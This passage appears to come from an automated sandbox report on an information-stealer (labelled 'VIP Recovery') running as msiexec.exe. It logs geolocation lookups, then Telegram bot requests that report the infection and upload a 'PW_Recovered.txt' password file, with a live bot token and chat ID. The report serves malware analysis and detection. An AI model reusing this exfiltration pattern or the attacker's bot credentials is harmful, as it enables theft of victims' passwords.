2024-12-23 20:50:47 UTC	1390	IN	Data Raw: 11 df cd a5 c5 07 76 a5 25 2c 98 ff 8a 98 5e 3c 73 12 f6 d7 84 bc 2c b5 db 5b 21 b9 c0 57 7a c9 76 ad e5 c6 c4 88 ff e6 2a 1c 6f 6c 79 e2 65 a6 b6 a6 28 c8 e6 e5 39 4f 26 03 5a 4b 5c d9 6b a9 71 3d 48 7f ac 70 16 36 71 02 d8 b8 a7 57 fd fc dc 8a bb 51 cc 19 24 da e9 f2 ee a3 72 dc ee 2b 9d cf a5 94 56 62 55 19 4d 7a 2d 0e 49 a6 d7 53 c9 be 75 d9 58 3b 4b 33 81 60 1d fa 00 58 53 f5 4d 34 d4 92 71 c8 80 4a 25 0f 42 c3 d3 a8 6c 09 2f e8 22 75 d0 f6 f6 3c ad 76 09 27 23 95 c2 60 cb 32 12 a1 1d 68 e4 a5 c8 21 3e 82 6e b8 61 67 46 b2 4a 26 8b 67 8e 99 1e ef c7 e4 cf df f9 78 c5 d7 f2 da 38 b7 73 40 b7 1e b9 f3 fe 89 a6 55 7d e6 42 75 a0 d2 7c 10 fa 07 39 23 a0 f1 b7 98 13 2b 41 24 9d aa ec da 0b 9f 6e 29 a4 4d e3 83 32 58 3e 87 eb d4 ef f8 06 e0 31 70 10 4f e8 Data Ascii: v%,^<s,[!Wzv*olye(9O&ZK\kq=Hp6qWQ$r+VbUMz-ISuX;K3`XSM4qJ%Bl/"u<v'#`2h!>nagFJ&gx8s@U}Bu\|9#+A$n)M2X>1pO
2024-12-23 20:50:47 UTC	1390	IN	Data Raw: d2 7a 1a 27 8f 57 89 a0 d4 95 ac cd 27 4b 3e ae ad cd d7 0a 9f 64 fd a4 91 3d 90 17 0e 3e 87 eb da 8e 69 04 c8 23 66 38 c4 35 cf 34 9a ea 46 89 3c 76 ca b7 6a 36 71 06 48 b8 0d 81 26 5b f8 e9 ea 89 7c 63 3e a1 0e 9b fa 4c 27 30 25 89 01 7c e2 42 1c d5 f3 ee ec 93 6d ae c3 17 d6 a2 3b 21 bd 34 7f c5 32 45 7a 16 8b 85 a5 53 72 3c e8 1e da 9a 9c 11 ec 23 af 20 ba 18 c6 14 e7 18 24 25 99 ed 9b 2e eb e5 8f 68 25 9d 92 20 f3 59 43 97 a6 30 30 e9 9b 4e 28 74 51 5c 20 46 31 1e 4b 96 5d 0d ab af 25 c4 be 9b ea eb 88 f4 b1 56 73 19 6d 5d 9f da 11 97 09 38 6e f5 df fe ca 2c 46 b9 22 a4 d6 a7 34 fc 20 21 2d 56 58 93 a2 22 47 95 40 59 29 38 ec 76 08 ab 20 bb 53 49 6c ff de e2 c2 57 42 66 d3 5c 54 01 a5 df 54 b1 af f9 88 a6 ef e9 a9 71 28 3d b1 e4 3d d4 59 36 e9 5e 2f Data Ascii: z'W'K>d=>i#f854F<vj6qH&[\|c>L'0%\|Bm;!42EzSr<# $%.h% YC00N(tQ\ F1K]%Vsm]8n,F"4 !-VX"G@Y)8v SIlWBf\TTq(==Y6^/
2024-12-23 20:50:47 UTC	1390	IN	Data Raw: fc 99 b2 5e 89 f1 6c 70 2f 9c f7 b0 16 e3 43 ba 80 49 1a db fb f6 94 b1 29 9c b9 9d de 1d 54 43 e1 b9 91 3d d0 f1 7c a9 2c 68 e8 0f f7 b4 42 50 87 48 e7 f2 a9 66 82 73 1b e9 2b 3d dd 0a 91 cc a9 99 16 36 12 68 aa fc e3 6f 8b e7 a9 d1 8f 79 d9 57 fa dc 64 f3 19 57 38 b4 d9 16 ed ac 34 d9 0a 37 ad 45 d3 33 5a e0 d9 b6 97 6f 13 7b 7e dc 46 33 d5 a7 09 5a dc 0c e8 ec 37 31 b3 c0 e7 b0 e5 84 7b 57 17 b3 10 82 2e 18 aa 78 49 c1 ff 15 e2 60 23 67 3c e6 71 97 ee a0 b5 b0 38 91 cc 2a ab 45 58 93 ac 2c 68 d3 4f 9c 53 fd d2 d2 67 a7 b0 24 08 8f 0f 95 fb 16 8f 0c bf 7a df c3 e1 d3 cf 87 42 b6 79 61 74 4b 0c 15 1b ed 0d c1 7a 24 56 b6 b2 ab aa 7b 0e d4 84 50 1c e0 5d 67 10 08 fb 8a 73 dc 1f 46 f7 e7 34 2b 34 02 bd 40 a0 90 07 a6 85 a1 c8 45 70 89 ba 6c 9c fd 87 9f 05 Data Ascii: ^lp/CI)TC=\|,hBPHfs+=6hoyWdW847E3Zo{~F3Z71{W.xI`#g<q8*EX,hOSg$zByatKz$V{P]gsF4+4@Epl
2024-12-23 20:50:47 UTC	1390	IN	Data Raw: 68 54 f5 86 50 66 54 50 fe 62 6f fe 9c fd 7f 29 4d 98 cd 18 27 21 b1 8f 35 18 a1 04 ac f5 03 c6 55 0e b8 ab 7a f7 95 a2 83 7d 06 1c b9 f5 9b d0 8c 4a 4a 6e 3b b3 c4 b4 3e 57 50 1c dd 40 4d b6 1b 10 03 af 23 05 95 ce a1 39 45 a6 9d e9 1f 3c 1c 76 cf b8 b2 df 63 91 e6 fc a8 46 99 00 82 ce ec 93 83 8c 8d e7 ea 76 35 d6 9d 5e ae 0a 95 78 79 ff c9 c4 ab a8 66 d8 69 61 6f e4 b2 1b bf 92 b8 be fa 0a 2a 73 33 ac 6b 8b 67 08 90 2b 98 4c c5 4a 78 10 4c 28 d5 6e 66 70 6e ee 85 e8 a5 ea 8f 97 aa 38 b3 20 0b 56 4a de fc 51 d8 7e 5a 98 99 3d 82 69 7a 6e e3 e5 cf 9a 85 73 d0 67 ab 9e 13 e7 f2 1c 44 ca 9c af 8f 3e 9c 94 3c 47 f6 6d aa e4 ef a1 f8 64 f1 b3 0b b5 09 0e e3 1a 7d ea 7a 74 1a 1a 53 93 c6 4c 43 7b 31 17 e1 01 72 19 54 15 29 a0 f2 39 2f c6 b2 65 6a 93 44 48 96 Data Ascii: hTPfTPbo)M'!5Uz}JJn;>WP@M#9E<vcFv5^xyfiao*s3kg+LJxL(nfpn8 VJQ~Z=iznsgD><Gmd}ztSLC{1rT)9/ejDH

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.7	49782	104.21.67.152	443	5500	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-23 20:50:54 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-12-23 20:50:54 UTC	858	IN	HTTP/1.1 200 OK Date: Mon, 23 Dec 2024 20:50:54 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 301843 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VaFwfC0F6Z8wh7CTCgRswJ3XnnX1Fo%2BTrHn1AUOoQOLdM3Txxj%2FT5DUOtl4TC10%2FGRmat66844YB%2Fpx8lAlTL3pd7A53kmQCYcVVQCAmCf1hZNzCsDcwOHdy2yH5%2BZlzmT3umzGV"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f6b3a013a5e0c76-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1949&min_rtt=1916&rtt_var=784&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1338835&cwnd=151&unsent_bytes=0&cid=56bfd8e1d30510de&ts=468&x=0"
2024-12-23 20:50:54 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.7	49804	104.21.67.152	443	5500	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-23 20:51:03 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2024-12-23 20:51:03 UTC	864	IN	HTTP/1.1 200 OK Date: Mon, 23 Dec 2024 20:51:03 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 301852 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IPXa9RB%2FQ9bOGyOoEXFSLQKVQdM%2FhIwrcuvcmDZHp%2FMHmiwIfkgbwegH5VoKD8l5HwXqD88H%2FTZgQ6jOwnBXs%2FwaQ5Pn%2BAh7VUWw%2FIJLlw4Mozukzwx8fcI0wNnMh%2BeyZ096xFtf"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f6b3a3a7a5741a1-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1606&min_rtt=1601&rtt_var=611&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=699&delivery_rate=1775075&cwnd=226&unsent_bytes=0&cid=a3dd54f87aa61a4f&ts=461&x=0"
2024-12-23 20:51:03 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.7	49812	104.21.67.152	443	5500	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-23 20:51:06 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-12-23 20:51:06 UTC	864	IN	HTTP/1.1 200 OK Date: Mon, 23 Dec 2024 20:51:06 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 301855 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=767V6HJ4dQI%2B6W9h1cczvqaIiBkgp%2F536B5ky%2BeYDBE9NFwFCImxyxnxR5sPjZTRXlNfLKHC%2BykILqwkD%2FvtQmQI0MsYEzk7hOykWa%2FCaQUj5mmnFysnQ%2FtMA9Im8kcjB%2FogRrKJ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f6b3a4e7f5842bc-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1576&min_rtt=1569&rtt_var=603&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1792510&cwnd=225&unsent_bytes=0&cid=905082d608a4b0f9&ts=461&x=0"
2024-12-23 20:51:06 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.7	49823	104.21.67.152	443	5500	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-23 20:51:10 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2024-12-23 20:51:11 UTC	864	IN	HTTP/1.1 200 OK Date: Mon, 23 Dec 2024 20:51:11 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 301860 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0YLkBo3b0bU885qgWXk%2FxHyUMA9lHlS2tR3496sXMWMxUaCoZABQHKlGXPZq8ByWH2lkzBDADC%2FXuaKA%2FOaWGABUNRq%2BFz7n%2BTnpC06vR0NxUZg%2Fl9WMCwaL1e%2B0DMRkBZYBpwHK"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f6b3a6b0995440b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=13231&min_rtt=1639&rtt_var=7625&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1781574&cwnd=227&unsent_bytes=0&cid=1db53a2cfcadc808&ts=457&x=0"
2024-12-23 20:51:11 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.7	49848	104.21.67.152	443	5500	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-23 20:51:19 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-12-23 20:51:20 UTC	854	IN	HTTP/1.1 200 OK Date: Mon, 23 Dec 2024 20:51:20 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 301869 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YDk5ImkLnMrzRrHhSgujoW5JfkxOf7aaFVqoSR3gA3CI3%2BWhgP7DKHmn9zYB2WiP%2BpQcW88xG0%2Ffkq9gcho6Wu9YJkrr7cL3PmHWPEBbbguGyZXkMA966FfLEYh8lLUbsAp13OEY"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f6b3aa2384341e1-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2387&min_rtt=2361&rtt_var=904&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1236764&cwnd=243&unsent_bytes=0&cid=be8cfcc68444c363&ts=475&x=0"
2024-12-23 20:51:20 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.7	49860	104.21.67.152	443	5500	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-23 20:51:23 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-12-23 20:51:23 UTC	858	IN	HTTP/1.1 200 OK Date: Mon, 23 Dec 2024 20:51:23 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 301872 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aR3WQpcQu0nLVNB8ITqawTV%2B839SsufVZmix6wHQf9PDxCl0A4HjX2DJ7MAAqOtSbv%2Frdd8elsV0uLg36oPGtHgzRc8sTsPk%2FaIbDd2rGNvTH4szTL71j0DF%2BPqgGPO60%2BvZA96y"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f6b3ab7eff6435c-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2431&min_rtt=2383&rtt_var=928&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1225346&cwnd=249&unsent_bytes=0&cid=7c61318908fe1c57&ts=455&x=0"
2024-12-23 20:51:23 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.7	49866	149.154.167.220	443	5500	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-23 20:51:25 UTC	349	OUT	GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:927537%0D%0ADate%20and%20Time:%2024/12/2024%20/%2015:16:08%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20927537%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2024-12-23 20:51:25 UTC	344	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Mon, 23 Dec 2024 20:51:25 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-23 20:51:25 UTC	55	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.7	49884	149.154.167.220	443	5500	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-23 20:51:33 UTC	352	OUT	POST /bot7745751910:AAGY46QDCTWO_Pw9iDqZhkNij-i4uwbMgzE/sendDocument?chat_id=7695061973&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dd24aa9531a714 Host: api.telegram.org Content-Length: 568
2024-12-23 20:51:33 UTC	568	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 34 61 61 39 35 33 31 61 37 31 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 39 32 37 35 33 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 33 2f 31 32 2f 32 30 32 34 20 2f 20 31 37 3a 30 35 Data Ascii: --------------------------8dd24aa9531a714Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW \| user \| VIP Recovery PC Name:927537Date and Time: 23/12/2024 / 17:05
2024-12-23 20:51:34 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 23 Dec 2024 20:51:34 GMT Content-Type: application/json Content-Length: 544 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-23 20:51:34 UTC	544	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 36 36 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 34 35 37 35 31 39 31 30 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 41 70 61 63 68 65 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 43 68 69 6e 65 6c 6f 32 32 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 36 39 35 30 36 31 39 37 33 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 68 69 6e 65 6c 6f 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 49 66 65 62 75 63 68 65 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 61 6c 69 7a 7a 69 5f 32 32 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 39 38 37 30 39 34 2c Data Ascii: {"ok":true,"result":{"message_id":1664,"from":{"id":7745751910,"is_bot":true,"first_name":"Apache","username":"Chinelo22bot"},"chat":{"id":7695061973,"first_name":"Chinelo","last_name":"Ifebuche","username":"alizzi_22","type":"private"},"date":1734987094,

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.7	49895	149.154.167.220	443	5500	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
